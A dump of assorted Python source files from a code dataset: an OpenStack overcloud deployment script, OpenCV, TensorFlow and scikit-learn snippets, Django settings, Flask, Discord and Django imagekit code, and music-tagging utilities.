parser.add_argument('--node_placement',\n action='store_true',\n default=False,\n help=\"Control which physical server is assigned \"\n \"which instance\")\n parser.add_argument(\"--debug\",\n default=False,\n action='store_true',\n help=\"Indicates if the deploy-overcloud script \"\n \"should be run in debug mode\")\n parser.add_argument(\"--mtu\",\n dest=\"mtu\",\n type=int,\n required=True,\n default=1500,\n help=\"Tenant Network MTU\")\n parser.add_argument(\"--dashboard_enable\",\n action='store_true',\n default=False,\n help=\"Enable the ceph dashboard deployment\")\n parser.add_argument('--network_data',\n action='store_true',\n default=False,\n help=\"Use network_data.yaml to create edge site \"\n \"networks\")\n\n LoggingHelper.add_argument(parser)\n args = parser.parse_args()\n LoggingHelper.configure_logging(args.logging_level)\n p = re.compile('\\d+:\\d+') # noqa: W605\n if not p.match(args.vlan_range):\n raise ValueError(\"Error: The VLAN range must be a number followed \"\n \"by a colon, followed by another number\")\n os_auth_url, os_tenant_name, os_username, os_password, \\\n os_user_domain_name, os_project_domain_name = \\\n CredentialHelper.get_undercloud_creds()\n\n # Set up the default flavors\n control_flavor = \"control\"\n ceph_storage_flavor = \"ceph-storage\"\n swift_storage_flavor = \"swift-storage\"\n block_storage_flavor = \"block-storage\"\n\n if args.node_placement:\n validate_node_placement()\n\n # If node-placement is specified, then the baremetal flavor must\n # be used\n control_flavor = BAREMETAL_FLAVOR\n ceph_storage_flavor = BAREMETAL_FLAVOR\n swift_storage_flavor = BAREMETAL_FLAVOR\n block_storage_flavor = BAREMETAL_FLAVOR\n\n # Validate that the NIC envronment file exists\n nic_env_file = os.path.join(home_dir,\n \"pilot/templates/nic-configs\",\n args.nic_env_file)\n if not os.path.isfile(nic_env_file):\n raise ValueError(\"\\nError: The nic_env_file {} does not \"\n \"exist!\".format(nic_env_file))\n\n # Apply any patches required on the Director itself. This is done each\n # time the overcloud is deployed (instead of once, after the Director\n # is installed) in order to ensure an update to the Director doesn't\n # overwrite the patch.\n # logger.info(\"Applying patches to director...\")\n # cmd = os.path.join(home_dir, 'pilot', 'patch-director.sh')\n # status = os.system(cmd)\n # if status != 0:\n # raise ValueError(\"\\nError: {} failed, unable to continue. See \"\n # \"the comments in that file for additional \"\n # \"information\".format(cmd))\n # Pass the parameters required by puppet which will be used\n # to enable/disable dell nfv features\n # Edit the dellnfv_environment.yaml\n # If disabled, default values will be set and\n # they won't be used for configuration\n # Create ConfigOvercloud object\n print(\"Configure environment file\")\n config = ConfigOvercloud(args.overcloud_name)\n # Remove this when Numa siblings added\n # Edit the dellnfv_environment.yaml\n config.edit_environment_files(\n args.mtu,\n args.enable_hugepages,\n args.enable_numa,\n args.hugepages_size,\n args.hostos_cpu_count,\n args.ovs_dpdk,\n args.sriov,\n args.hw_offload,\n args.sriov_interfaces,\n nic_env_file,\n args.num_controllers,\n args.num_storage,\n control_flavor,\n ceph_storage_flavor,\n swift_storage_flavor,\n block_storage_flavor,\n args.vlan_range,\n args.time_zone,\n args.num_dell_computes,\n args.num_dell_computeshci,\n args.num_powerflex\n )\n\n # Launch the deployment\n overcloud_name_opt = \"\"\n if args.overcloud_name is not None:\n overcloud_name_opt = \"--stack \" + args.overcloud_name\n\n debug = \"\"\n if args.debug:\n debug = \"--debug\"\n\n # The order of the environment files is important as a later inclusion\n # overrides resources defined in prior inclusions.\n\n env_opts = \"\"\n # If there are edge sites we have to use network_data.yaml and\n # it must in as first argument.\n if args.network_data:\n env_opts += \"-n ~/pilot/templates/network_data.yaml \"\n # The roles_data.yaml must be included at the beginning.\n # This is needed to enable the custom role Dell Compute.\n # It overrides the default roles_data.yaml\n env_opts += \"-r ~/pilot/templates/roles_data.yaml\"\n\n # The static-ip-environment.yaml must be included after the\n # network-environment.yaml\n if args.static_ips:\n env_opts += \" -e ~/pilot/templates/static-ip-environment.yaml\"\n\n # The static-vip-environment.yaml must be included after the\n # network-environment.yaml\n if args.static_vips:\n env_opts += \" -e ~/pilot/templates/static-vip-environment.yaml\"\n\n # The configure-barbican.yaml must be included after the\n # network-environment.yaml\n if args.barbican_enable:\n env_opts += \" -e ~/pilot/templates/configure-barbican.yaml\"\n\n # The octavia.yaml must be included after the\n # network-environment.yaml\n if args.octavia_enable:\n env_opts += \" -e ~/pilot/templates/octavia.yaml\"\n if args.octavia_user_certs_keys is True:\n env_opts += \" -e ~/pilot/templates/cert_keys.yaml\"\n\n if args.node_placement:\n env_opts += \" -e ~/pilot/templates/node-placement.yaml\"\n\n # The neutron-ovs.yaml must be included before dell-environment.yaml to enable ovs and disable ovn\n # in OSP16.1. In case we need to use OVN in future, please delete this line\n env_opts += \" -e ~/pilot/templates/overcloud/environments/services/neutron-ovs.yaml\"\n\n # The neutron-ovs-dvr.yaml.yaml must be included after the\n # neutron-ovs.yaml\n if args.dvr_enable:\n env_opts += \" -e ~/pilot/templates/neutron-ovs-dvr.yaml\"\n\n # The dell-environment.yaml must be included after the\n # storage-environment.yaml and ceph-radosgw.yaml\n if args.num_powerflex > 0:\n env_opts += \" -e ~/containers-prepare-parameter.yaml\" \\\n \" -e ~/pilot/templates/dell-environment.yaml\"\n else:\n env_opts += \" -e ~/pilot/templates/overcloud/environments/\" \\\n \"storage-environment.yaml\" \\\n \" -e ~/containers-prepare-parameter.yaml\" \\\n \" -e ~/pilot/templates/dell-environment.yaml\"\n\n host_config = False\n if args.enable_hugepages or args.enable_numa:\n env_opts += \" -e ~/pilot/templates/overcloud/environments/\" \\\n \"host-config-and-reboot.yaml\"\n host_config = True\n if args.ovs_dpdk:\n if not args.enable_hugepages or not args.enable_numa:\n raise ValueError(\"Both hugepages and numa must be\" +\n \"enabled in order to use OVS-DPDK\")\n else:\n env_opts += \" -e ~/pilot/templates/neutron-ovs-dpdk.yaml\"\n\n if args.sriov:\n env_opts += \" -e ~/pilot/templates/neutron-sriov.yaml\"\n if args.hw_offload:\n env_opts += \" -e ~/pilot/templates/ovs-hw-offload.yaml\"\n if not host_config:\n env_opts += \" -e ~/pilot/templates/overcloud/environments/\" \\\n \"host-config-and-reboot.yaml\"\n\n if args.enable_dellsc:\n env_opts += \" -e ~/pilot/templates/dellsc-cinder-config.yaml\"\n\n if args.enable_unity:\n env_opts += \" -e ~/pilot/templates/dellemc-unity-cinder-\" \\\n \"container.yaml\"\n env_opts += \" -e ~/pilot/templates/dellemc-unity-cinder-\" \\\n \"backend.yaml\"\n\n if args.enable_unity_manila:\n env_opts += \" -e ~/pilot/templates/unity-manila-container.yaml\"\n env_opts += \" -e ~/pilot/templates/unity-manila-config.yaml\"\n\n if args.enable_powermax:\n if args.powermax_protocol == \"iSCSI\":\n env_opts += \" -e ~/pilot/templates/dellemc-powermax-iscsi-cinder-\" \\\n \"backend.yaml\"\n else:\n env_opts += \" -e ~/pilot/templates/dellemc-powermax-fc-cinder-\" \\\n \"backend.yaml\"\n if args.enable_powermax_manila:\n env_opts += \" -e ~/pilot/templates/powermax-manila-config.yaml\"\n\n if args.num_powerflex > 0:\n env_opts += \" -e ~/pilot/templates/overcloud/environments/powerflex-ansible/powerflex-ansible.yaml\"\n env_opts += \" -e ~/pilot/templates/dellemc-powerflex-cinder-backend.yaml\"\n env_opts += \" -e ~/pilot/templates/custom-dellemc-volume-mappings.yaml\"\n else:\n env_opts += \" -e /usr/share/openstack-tripleo-heat-templates/environments/ceph-ansible/ceph-ansible.yaml\" \\\n \" -e /usr/share/openstack-tripleo-heat-templates/environments/ceph-ansible/ceph-rgw.yaml\"\n \n if args.dashboard_enable:\n env_opts += \" -e /usr/share/openstack-tripleo-heat-templates/environments/ceph-ansible/ceph-dashboard.yaml\"\n env_opts += \" -e ~/pilot/templates/ceph_dashboard_admin.yaml\"\n\n # The network-environment.yaml must be included after other templates\n # for effective parameter overrides (External vlan default route)\n # The network-environment.yaml must be included after the network-isolation.yaml\n env_opts += \" -e ~/pilot/templates/overcloud/environments/\" \\\n \"network-isolation.yaml\" \\\n \" -e ~/pilot/templates/network-environment.yaml\" \\\n \" -e {} \" \\\n \"-e ~/pilot/templates/site-name.yaml\".format(nic_env_file)\n\n cmd = \"cd ;source ~/stackrc; openstack overcloud deploy\" \\\n \" {}\" \\\n \" --log-file ~/pilot/overcloud_deployment.log\" \\\n \" -t {}\" \\\n \" {}\" \\\n \" --templates ~/pilot/templates/overcloud\" \\\n \" {}\" \\\n \" --libvirt-type kvm\" \\\n \" --no-cleanup\" \\\n \" --ntp-server {}\" \\\n \"\".format(debug,\n args.timeout,\n overcloud_name_opt,\n env_opts,\n args.ntp_server_fqdn,\n )\n with open(os.path.join(home_dir, 'pilot', 'overcloud_deploy_cmd.log'),\n 'w') as f:\n f.write(cmd.replace(' -', ' \\\\\\n -'))\n f.write('\\n')\n start = time.time()\n status = run_deploy_command(cmd)\n end = time.time()\n logger.info('\\nExecution time: {} (hh:mm:ss)'.format(\n time.strftime('%H:%M:%S', time.gmtime(end - start))))\n logger.info('Fetching SSH keys...')\n\n update_ssh_config()\n if status == 0:\n horizon_url = finalize_overcloud()\n logger.info(\"\\nDeployment Completed\")\n else:\n horizon_url = None\n\n logger.info('Overcloud nodes:')\n identify_nodes()\n\n if horizon_url:\n logger.info('\\nHorizon Dashboard URL: {}\\n'.format(horizon_url))\n except Exception as err:\n print(sys.stderr, err)\n raise\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/pilot/deploy-overcloud.py","file_name":"deploy-overcloud.py","file_ext":"py","file_size_in_byte":28771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"349420722","text":"import cv2\nimport numpy as np\ndef findCenter():\n\n X = []\n img = cv2.imread('/home/purvikpatel_/catkin_ws/src/img_processing/scripts/image.png', 1)\n hsv = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n mask = cv2.inRange(hsv,(88,100,100),(130,255,255))\n inv = cv2.bitwise_not(mask)\n inv = cv2.GaussianBlur(inv,(15,15),0)\n res = cv2.bitwise_and(hsv,hsv,mask = inv)\n kernel = np.ones((5,5),np.uint8)\n res = cv2.erode(res,kernel,iterations=1)\n res = cv2.cvtColor(res,cv2.COLOR_HSV2BGR)\n res = cv2.cvtColor(res,cv2.COLOR_BGR2GRAY)\n\n _, contours , _ = cv2.findContours(res,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n for contour in contours:\n x = cv2.moments(contour)\n if x['m00']!=0:\n cX = int(x['m10']/x['m00'])\n cY = int(x['m01']/x['m00'])\n else:\n cX,cY = 0,0\n X.append(cX)\n X.append(cY)\n \n\n return X\n","sub_path":"image_processing.py","file_name":"image_processing.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"371899715","text":"#/usr/bin/python3\nimport math\n\ndef errortest(x, y):\n while True:\n try:\n x = int(input('Number 1: '))\n y = int(input('Number 2: '))\n except ValueError:\n print('Please enter two non-zero positive integers.')\n continue\n else:\n break\n\ndef prim(num_prime):\n for num_prime in range(2,num_prime):\n if all(num_prime%i!=0 for i in range(2, int(math.sqrt(num_prime))+1)):\n print(num_prime)\n\ndef gcd(x,y):\n while y != x:\n if x > y:\n x -= y\n elif y > x:\n y -= x\n print(y)\n\ndef basic(x, y, z):\n if y == '+':\n ans = x + y\n elif y == '-':\n ans = x - y\n elif y == '*':\n ans = x * y\n elif y == '/':\n ans = x / y\n\ndef factorial(n):\n if n == 0:\n return 1\n else:\n return n * factorial(n - 1)\n\nwhile True:\n fun = input('Function: ')\n fun = fun.upper()\n\n if fun == 'BASIC':\n num_1 = float(input('Number 1: '))\n function = str(input('Function: '))\n num_2 = float(input('Number 2: '))\n basic(num_1, function, num_2)\n print(ans)\n","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"307224650","text":"import os\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom tensorflow.keras.models import load_model\n\n\ndef init():\n global model\n global input_width\n global input_height\n\n # AZUREML_MODEL_DIR is an environment variable created during deployment\n model_path = os.path.join(os.environ[\"AZUREML_MODEL_DIR\"], \"model\")\n\n # load the model\n model = load_model(model_path)\n input_width = 244\n input_height = 244\n\n\ndef decode_img(file_path):\n file = tf.io.read_file(file_path)\n img = tf.io.decode_jpeg(file, channels=3)\n img = tf.image.resize(img, [input_width, input_height])\n return img / 255.0\n\n\ndef run(mini_batch):\n images_ds = tf.data.Dataset.from_tensor_slices(mini_batch)\n images_ds = images_ds.map(decode_img).batch(64)\n\n # perform inference\n pred = model.predict(images_ds)\n\n # Compute probabilities, classes and labels\n pred_prob = tf.math.reduce_max(tf.math.softmax(pred, axis=-1)).numpy()\n pred_class = tf.math.argmax(pred, axis=-1).numpy()\n\n return pd.DataFrame(\n {\n \"file\": mini_batch,\n \"class\": pred_class,\n \"probability\": pred_prob,\n }\n )\n","sub_path":"sdk/python/endpoints/batch/deploy-models/imagenet-classifier/code/score-by-batch/batch_driver.py","file_name":"batch_driver.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"524777168","text":"# SECURITY WARNING: keep the secret key used in production secret!\nimport os\n\nfrom quarantined_backend.settings import BASE_DIR\n\nSECRET_KEY = \"%5r@$^)+$$#$%ˆˆ%ˆˆˆˆ%$%%$&ˆˆFFDFDSFSDF@$@#DSSFDZzzzSAe3n%fm_\"\n\n# Database\n# https://docs.djangoproject.com/en/2.2/ref/settings/#databases\n# We do not support sqlite anymore\nDATABASES = {\n \"default\": {\n \"ENGINE\": \"django.contrib.gis.db.backends.postgis\",\n \"NAME\": \"DATABASE_NAME\",\n \"USER\": \"DATABASE_USER\",\n \"PASSWORD\": \"DATABASE_PASSWORD\",\n \"HOST\": \"DATABASE_HOST\",\n \"PORT\": \"\",\n }\n}\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\nSTATIC_URL = \"/static/\"\nSTATIC_ROOT = os.path.join(BASE_DIR, \"static/\")\n\nALLOWED_HOSTS = []\n\nimport sentry_sdk\nfrom sentry_sdk.integrations.django import DjangoIntegration\n\nif not DEBUG:\n sentry_sdk.init(\n dsn=\"sentrydsn\",\n integrations=[DjangoIntegration()],\n # If you wish to associate users to errors (assuming you are using\n # django.contrib.auth) you may enable sending PII data.\n send_default_pii=True,\n )\n\n ANYMAIL = {\"SENDINBLUE_API_KEY\": \"\"}\n DEFAULT_FROM_EMAIL = \"no-reply@quarantine-help.space\"\n SERVER_EMAIL = \"no-reply@quarantine-help.space\"\n","sub_path":"quarantined_backend/local_settings_sample.py","file_name":"local_settings_sample.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"503519542","text":"# -*- coding: utf-8 -*-\nimport pyyandexmusic\nym = pyyandexmusic.YandexMusic()\n\ntrack_resp = ym.search(\"Amon Amarth\")\n# найдем треки по ключевому слову Mozart.\n# Обратите внимание на то, что в случае\n# поисков треков параметр search_type можно не указывать\noffset_track_resp = ym.search(\"Mozart\", offset=2)\n# поскольку результаты по запросу Mozart расположены\n# на более чем 1 странице, необходимо учитывать\n# это разбиение при поиске. Для это используем параметр offset,\n# с помощью которого буду возвращены результаты с учётом смещение\n# в нашем случае на 2 страницы. При этом следует помнить,\n# что нумерация начинается с 0\nartists_resp = ym.search(\"Mozart\", \"artists\")\n# найдем исполнителей по ключевому слову Mozart.\n","sub_path":"example/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"529762462","text":"from discord.ext.commands import Bot\n\n\nclass BaseBot(Bot):\n def __init__(self, config, command_prefix, *args, **kwargs):\n super(BaseBot, self).__init__(command_prefix, *args, **kwargs)\n self.config = config\n self.owner = str(config['owner'])\n\n async def on_ready(self):\n self.load_extension('cmds')\n print('Logged in as {0} {0.id}'.format(self.user))\n\n async def add_role(self, user, role, server=None):\n if not isinstance(user, str):\n user_id = user.id\n server_id = user.server.id\n\n else:\n user_id = user\n server_id = server.id if not isinstance(server, str) else server\n\n role_id = role.id if not isinstance(role, str) else role\n\n await self.http.add_role(server_id, user_id, role_id)\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"484913835","text":"import tensorflow as tf\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport input_data\r\nmnist = input_data.read_data_sets('MNIST_data', one_hot=True)\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\r\n\r\ndef add_layer(inputs,in_size,out_size,activation_function = None):\r\n Weights = tf.Variable(tf.random.normal([in_size,out_size]))\r\n biases = tf.Variable(tf.zeros([1,out_size])+0.1)\r\n \r\n Wx_plus_b = tf.matmul(inputs,Weights)+biases\r\n if activation_function is None:\r\n outputs = Wx_plus_b\r\n else:\r\n outputs = activation_function(Wx_plus_b)\r\n return outputs\r\n\r\ndef compute_accuracy(v_xs,v_ys,i):\r\n global prediction\r\n y_pre = sess.run(prediction,feed_dict={xs:v_xs})\r\n ''''x = v_xs[i,:]\r\n print(y.argmax())\r\n img = x.reshape(28,28)\r\n plt.imshow(img)\r\n plt.show()\r\n y = y_pre[i,:]'''\r\n correct_prediction = tf.equal(tf.argmax(y_pre,1),tf.argmax(v_ys,1))\r\n accuracy= tf.reduce_mean(tf.cast(correct_prediction,tf.float32))\r\n result = sess.run(accuracy,feed_dict={xs:v_xs,ys:v_ys})\r\n return result\r\n\r\nxs = tf.compat.v1.placeholder(tf.float32,[None,784])\r\nys = tf.compat.v1.placeholder(tf.float32,[None,10])\r\n\r\nprediction = add_layer(xs, 784, 10, activation_function = tf.nn.softmax)\r\n\r\ncross_entropy = tf.reduce_mean(-tf.reduce_sum(ys*tf.math.log(prediction),\r\n reduction_indices = [1])) #loss\r\ntrain_step = tf.compat.v1.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)\r\nsess = tf.compat.v1.Session()\r\n\r\nsess.run(tf.compat.v1.global_variables_initializer())\r\n\r\nfor i in range(1000):\r\n batch_xs,batch_ys = mnist.train.next_batch(100)\r\n #print(batch_ys.shape)\r\n #print(batch_xs.shape)\r\n sess.run(train_step,feed_dict={xs:batch_xs,ys:batch_ys})\r\n if i%50 == 0:\r\n print(compute_accuracy(mnist.test.images,mnist.test.labels,i))\r\n #compute_accuracy(mnist.test.images,mnist.test.labels,i)\r\n","sub_path":"tensorflow_test/eg_3.py","file_name":"eg_3.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"496886393","text":"def appendAndDelete(s, t, k):\n nsame = min(len(s), len(t))\n for i in range(len(t)):\n if s[:i] != t[:i]:\n nsame = i-1\n break\n\n diff = len(s)-nsame + len(t)-nsame\n if (diff <= k and diff%2 == k%2) or len(s) + len(t) < k :\n return 'Yes'\n else:\n return 'No'\n","sub_path":"Problem Solving - Algorithms/Append_and_Delete.py","file_name":"Append_and_Delete.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"217071735","text":"from __future__ import with_statement\n\nimport os\nimport tempfile\n\nfrom django.core.files.base import ContentFile\nfrom django.db import models\nfrom django.test import TestCase\n\nfrom imagekit import utils\nfrom imagekit.lib import Image\nfrom imagekit.models import ImageSpec\nfrom imagekit.processors import Adjust\nfrom imagekit.processors.resize import Crop, SmartCrop\n\n\nclass Photo(models.Model):\n original_image = models.ImageField(upload_to='photos')\n\n thumbnail = ImageSpec([Adjust(contrast=1.2, sharpness=1.1), Crop(50, 50)],\n image_field='original_image', format='JPEG',\n options={'quality': 90})\n\n smartcropped_thumbnail = ImageSpec([Adjust(contrast=1.2, sharpness=1.1), SmartCrop(50, 50)],\n image_field='original_image', format='JPEG',\n options={'quality': 90})\n\n\nclass IKTest(TestCase):\n def generate_image(self):\n tmp = tempfile.TemporaryFile()\n Image.new('RGB', (800, 600)).save(tmp, 'JPEG')\n tmp.seek(0)\n return tmp\n\n def generate_lenna(self):\n \"\"\"\n See also:\n\n http://en.wikipedia.org/wiki/Lenna\n http://sipi.usc.edu/database/database.php?volume=misc&image=12\n\n \"\"\"\n tmp = tempfile.TemporaryFile()\n lennapath = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'assets', 'lenna-800x600-white-border.jpg')\n with open(lennapath, \"r+b\") as lennafile:\n Image.open(lennafile).save(tmp, 'JPEG')\n tmp.seek(0)\n return tmp\n\n def create_photo(self, name):\n photo = Photo()\n img = self.generate_lenna()\n file = ContentFile(img.read())\n photo.original_image = file\n photo.original_image.save(name, file)\n photo.save()\n img.close()\n return photo\n\n def setUp(self):\n self.photo = self.create_photo('test.jpg')\n\n def test_nodelete(self):\n \"\"\"Don't delete the spec file when the source image hasn't changed.\n\n \"\"\"\n filename = self.photo.thumbnail.file.name\n thumbnail_timestamp = os.path.getmtime(filename)\n self.photo.save()\n self.assertTrue(self.photo.thumbnail.storage.exists(filename))\n\n def test_save_image(self):\n photo = Photo.objects.get(id=self.photo.id)\n self.assertTrue(os.path.isfile(photo.original_image.path))\n\n def test_setup(self):\n self.assertEqual(self.photo.original_image.width, 800)\n self.assertEqual(self.photo.original_image.height, 600)\n\n def test_thumbnail_creation(self):\n photo = Photo.objects.get(id=self.photo.id)\n self.assertTrue(os.path.isfile(photo.thumbnail.file.name))\n\n def test_thumbnail_size(self):\n \"\"\" Explicit and smart-cropped thumbnail size \"\"\"\n self.assertEqual(self.photo.thumbnail.width, 50)\n self.assertEqual(self.photo.thumbnail.height, 50)\n self.assertEqual(self.photo.smartcropped_thumbnail.width, 50)\n self.assertEqual(self.photo.smartcropped_thumbnail.height, 50)\n\n def test_thumbnail_source_file(self):\n self.assertEqual(\n self.photo.thumbnail.source_file, self.photo.original_image)\n\n\nclass IKUtilsTest(TestCase):\n def test_extension_to_format(self):\n self.assertEqual(utils.extension_to_format('.jpeg'), 'JPEG')\n self.assertEqual(utils.extension_to_format('.rgba'), 'SGI')\n\n with self.assertRaises(utils.UnknownExtensionError):\n utils.extension_to_format('.txt')\n\n def test_format_to_extension_no_init(self):\n self.assertEqual(utils.format_to_extension('PNG'), '.png')\n self.assertEqual(utils.format_to_extension('ICO'), '.ico')\n\n with self.assertRaises(utils.UnknownFormatError):\n utils.format_to_extension('TXT')\n","sub_path":"tests/core/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"375601820","text":"#!/usr/bin/python3\n\"\"\"Starts flask\"\"\"\nfrom flask import Flask, make_response, jsonify\nfrom flask_cors import CORS, cross_origin\nfrom models import storage\nfrom api.v1.views import app_views\nimport os\napp = Flask(__name__)\napp.register_blueprint(app_views)\nhost = os.getenv('HBNB_API_HOST', '0.0.0.0')\nport = os.getenv('HBNB_API_PORT', 5000)\nCORS(app)\n\n\n@app.teardown_appcontext\ndef tear_down(exc=None):\n \"\"\"Tears down the application\"\"\"\n storage.close()\n\n\n@app.errorhandler(404)\ndef not_found(error):\n \"\"\"404 not found response\"\"\"\n return make_response(jsonify({'error': 'Not found'}), 404)\n\nif __name__ == '__main__':\n app.config['JSONIFY_PRETTYPRINT_REGULAR'] = True\n app.run(host=host, port=port, threaded=True)\n","sub_path":"api/v1/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"164878772","text":"from sklearn import preprocessing\nfrom sklearn.linear_model import LogisticRegression\n#from sklearn.cross_validation import train_test_split\nfrom sklearn import metrics \nfrom sklearn.metrics import classification_report\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.svm import SVC\n\ndef logistic_regression(X_train,X_test,y_train,y_test):\n LogReg = LogisticRegression()\n sc = StandardScaler()\n X_train = sc.fit_transform(X_train)\n X_test = sc.transform(X_test)\n LogReg.fit(X_train, y_train)\n y_predL = LogReg.predict(X_test)\n # Print the Accuracy of our Model.\n print('Correct Prediction Logistic Regression (%): ', accuracy_score(y_test, LogReg.predict(X_test), normalize = True) * 100.0)\n return y_predL , LogReg\n\n\ndef svc(X_train,X_test,y_train,y_test):\n sc = StandardScaler()\n X_train = sc.fit_transform(X_train)\n X_test = sc.transform(X_test)\n svc_classifier = SVC(kernel = 'linear', random_state = 0)\n svc_classifier.fit(X_train, y_train)\n y_predS = svc_classifier.predict(X_test)\n # Print the Accuracy of our Model.\n print('Correct Prediction SVC (%): ', accuracy_score(y_test, svc_classifier.predict(X_test), normalize = True) * 100.0)\n return y_predS , svc_classifier\n","sub_path":"Classification_Algo.py","file_name":"Classification_Algo.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"464109161","text":"import talon\n# don't forget to init the library first\n# it loads machine learning classifiers\ntalon.init()\n\nfrom talon import signature\n\n\nmessage = \"\"\"Thanks Sasha, I can't go any higher and is why I limited it to the\nhomepage.\n\nJohn Doe\nvia mobile\"\"\"\n\n\n\n\ntext, signature = signature.extract(message, sender='john.doe@example.com')\n# text == \"Thanks Sasha, I can't go any higher and is why I limited it to the\\nhomepage.\"\n# signature == \"John Doe\\nvia mobile\"\n\nprint(text)\nprint('########')\nprint(signature)\n\n# from talon.signature.bruteforce import extract_signature\n#\n#\n# # message = \"\"\"Wow. Awesome!\n# # --\n# # Bob Smith\"\"\"\n# message = \"\"\"Thanks Sasha, I can't go any higher and is why I limited it to the\n# homepage.\n#\n# John Doe\n# via mobile\"\"\"\n#\n# text, signature = extract_signature(message)\n# print(signature)\n# # text == \"Wow. Awesome!\"\n# # signature == \"--\\nBob Smith\"","sub_path":"extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"71299815","text":"# http://judge.mipt.ru/mipt_cs_on_python3/labs/lab1.html#o3\r\n# http://cs.mipt.ru/python/lessons/lab2.html#o3\r\n\r\n# Упражнение № 3: квадрат\r\n\r\nimport turtle\r\nimport turtle_helper\r\n\r\n\r\ndef main():\r\n wn = turtle_helper.make_window(\"lightgreen\", \"Square\")\r\n t = turtle_helper.make_turtle(\"red\", 2)\r\n size = 100\r\n\r\n for i in range(4):\r\n t.forward(size)\r\n t.left(90)\r\n\r\n\r\n wn.mainloop()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"1_turtle-1/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"176190190","text":"import re\nimport taglib\nimport dbus\nfrom sys import argv\n\n\nRE_SPLIT_PATTERN = '(?: (?=\\())|(?: (?=\\[))|(?: - )'\n\n\ndef get_labels(info):\n s = re.split('(\\W+)', info)\n for i in range(2, len(s)):\n if s[i].isdigit() or s[i].isupper():\n return ''.join(s[0:i - 1]), ''.join(s[i:])\n return '', ''\n\n\ndef method():\n tech_info = kid3.getInformation()\n file_path = kid3.getFileName()\n \n kid3.setFrame(2, 'PICTURE', '')\n kid3.setFrame(2, 'ALBUMARTIST', kid3.getFrame(2, 'ARTIST'))\n\n album_tokens = re.split(RE_SPLIT_PATTERN, kid3.getFrame(2, 'ALBUM'))\n \n index = 1\n while index < len(album_tokens) and album_tokens[index][0] != '[':\n index = index + 1\n index = index - 1\n \n if index > 1:\n disc_title = album_tokens[index - 1]\n if disc_title[0] == '(':\n disc_title = disc_title[1:-1]\n taglib.set_disc_title_frame(kid3, taglib.get_tag_type(tech_info), disc_title)\n for i in range(1, index):\n if album_tokens[i][0] != '(':\n album_tokens[i] = '(' + album_tokens[i] + ')'\n \n #album = ' '.join(album_tokens[0:index])\n original_album = album_tokens[0]\n album = original_album\n kid3.setFrame(2, 'ALBUM', album)\n kid3.setFrame(2, 'ORIGINALALBUM', original_album)\n \n if album_tokens[index][0] == '(':\n tokens2 = album_tokens[index][1:-1].split(', ')\n index2 = 0\n if tokens2[index2].isdigit():\n taglib.switch_date_frames(kid3, tokens2[index2])\n if len(tokens2) == 2:\n is_digital = True\n else:\n index2 = index2 + 1\n is_digital = False\n elif len(tokens2) == 2:\n is_digital = False\n #handle missing release date\n if not is_digital:\n labels = tokens2[index2]\n release_country = tokens2[index2 + 1]\n label, catalog_number = get_labels(labels)\n taglib.set_label_frame(kid3, label)\n taglib.set_release_country_frame(kid3, release_country)\n kid3.setFrame(2, 'CATALOGNUMBER', catalog_number)\n index = index + 1\n \n try:\n media = album_tokens[index][1:-1]\n if media in taglib.MEDIA_SHORT_TO_LONG:\n kid3.setFrame(2, 'MEDIA', taglib.MEDIA_SHORT_TO_LONG[media])\n except IndexError:\n kid3.setFrame(2, 'MEDIA', 'CD')\n \n #taglib.switch_date_frames(kid3, '')\n taglib.set_file_name_from_tag(kid3)\n \n return ''\n \n\nif __name__ == '__main__':\n kid3 = dbus.SessionBus().get_object('net.sourceforge.kid3', '/Kid3')\n taglib.tag_and_rename2(kid3, method, *taglib.get_args(argv))\n","sub_path":"kid3/method3.py","file_name":"method3.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} 